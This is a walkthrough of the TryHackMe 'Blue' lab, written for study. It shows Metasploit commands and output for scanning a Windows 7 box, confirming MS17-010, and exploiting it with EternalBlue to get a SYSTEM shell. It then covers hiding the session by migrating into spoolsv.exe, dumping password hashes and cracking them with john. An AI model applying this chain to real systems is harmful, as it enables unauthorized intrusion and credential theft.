TryHackMe - Blue
The room link can be found at TryHackMe - Blue
For this room, I will be using the Metasploit framework.
Recon
We begin with a Nmap of the box to see the services and get their version.
msf5 > db_nmap -sC -sV 10.10.47.219
Now we can see all the running services with the services
command.
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.47.219 135 tcp msrpc open Microsoft Windows RPC
10.10.47.219 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.47.219 445 tcp microsoft-ds open Windows 7 Professional 7601 Service Pack 1 microsoft-ds workgroup: WORKGROUP
10.10.47.219 3389 tcp ssl/ms-wbt-server open
10.10.47.219 49152 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49153 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49154 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49158 tcp msrpc open Microsoft Windows RPC
10.10.47.219 49160 tcp msrpc open Microsoft Windows RPC
On this machine, we will focus on the SMB service which is on port 445
.
We can gather more information using the module
auxiliary/scanner/smb/smb_version
. Running it the services page will lock
more like this.
10.10.47.219 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
Also we run auxiliary/scanner/smb/smb1
to check if the box has support for
SMBv1.
msf5 auxiliary(scanner/smb/smb1) > run
[+] 10.10.47.219:445 - 10.10.47.219 supports SMBv1 dialect.
[*] 10.10.47.219:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
As the machine name implies the box could be exploitable via EternalBlue. Since the machine has Windows 7 installed and SMBv1 enabled, it is most likely vulnerable. You can read more here Microsoft - EternalBlue.
We can check if the machine is vulnerable by running the module
auxiliary/scanner/smb/smb_ms17_010
.
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.47.219:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.47.219:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
<!--more-->
Gain Access
Now we search for an exploit we can use in Metasploit.
msf5 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Select it using use 2
, set LHOST
and RHOST
, and run it. The exploit could
fail multiple times. But if you continue trying it will succeed. You could also
try setting the payload to generic/shell_reverce_tcp
.
Now we have a meterpreter session on the box.
Escalate
If you have a simple shell you can use the
post/multi/manage/shell_to_meterpreter
module to upgrade your shell.
If you have a meterpreter shell you can check who you are with:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Since we are NT AUTHORITY\SYSTEM we have full administrator access to the
box. With this privilege, we can migrate our process to spoolsv.exe
to hide
our process. We can use ps
and migrate
command for this. Alternatively, we
can use run post/windows/manage/migrate
to spawn a notepad process and
migrate to it.
Cracking
To crack the passwords first we need to dump them. There are two ways to do
this, we can use the hashdump
command and crack them outside of Metasploit.
Else we can run the post module use post/windows/gather/hashdump
this will
save the hashes in the database. Then we run
use auxiliary/analyze/crack_windows
to crack them with john. The
challenge suggests us to use the wordlist rockyou.txt.
Find flags
To find the flag you can use the search
command with the file name from the
root directory.
meterpreter > search -f flag*